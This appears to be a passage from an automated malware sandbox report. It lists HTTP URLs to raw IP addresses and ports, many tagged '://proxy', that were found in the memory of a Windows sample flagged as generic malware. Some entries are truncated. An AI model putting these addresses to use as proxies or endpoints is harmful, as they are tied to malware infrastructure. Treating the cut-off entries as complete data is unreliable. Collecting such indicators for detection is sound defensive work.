                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C94D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.83.78.37:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.158.91:4480
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.158.91:4480://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.223.124:4153
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.223.124:4153://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51299
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51299://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.98.115:8181
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.98.115:8181://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.48.103:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.48.103:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C7F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.93.140.71:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.94.30.238:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.94.30.238:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.114.192.128:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.114.192.128:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.173.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.173.124:9353
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.173.124:9353://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.4
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.7
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.24.201:81://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:16113
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:16113://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.5
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:13412
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:13412://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD899C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:19767
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:19767://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:52593
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:52593://proxyP
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.5h
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.88.32:8001
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.88.32:8001://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.91.192:27898://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.195.222.7:52815://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.220.139.219:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.220.139.219:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.9
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.86.20
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.86.206:47464
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.86.206:47464://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252:80
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C80C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.254.217:5678
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.99.254.217:5678://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.102:9090://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.226:55994
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.226:55994://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.0.36:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.0.36:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.0.95:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.0.95:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.1.190:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.1.90:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.1.90:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.209:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.209:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.51:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.51:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.75:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89DE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.75:3128://proxyx
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AA95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.14.200:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.14.200:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.16.166:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.16.166:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.16.194:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.18.181:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD89B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.18.181:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.18.216:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.18.216:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.96:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.96:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.20.74:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.20.74:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.21.54:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.156:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.156:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.43:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.43:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.24.12:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8AAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.24.12:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.19:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.19:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C8CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C75C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.57:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8C8CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.57:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.61:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.61:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.62:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8B864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.62:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A798000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.65:3128
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD8A76D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.65:3128://proxy
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3246175014.000001CD898BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.80:3128
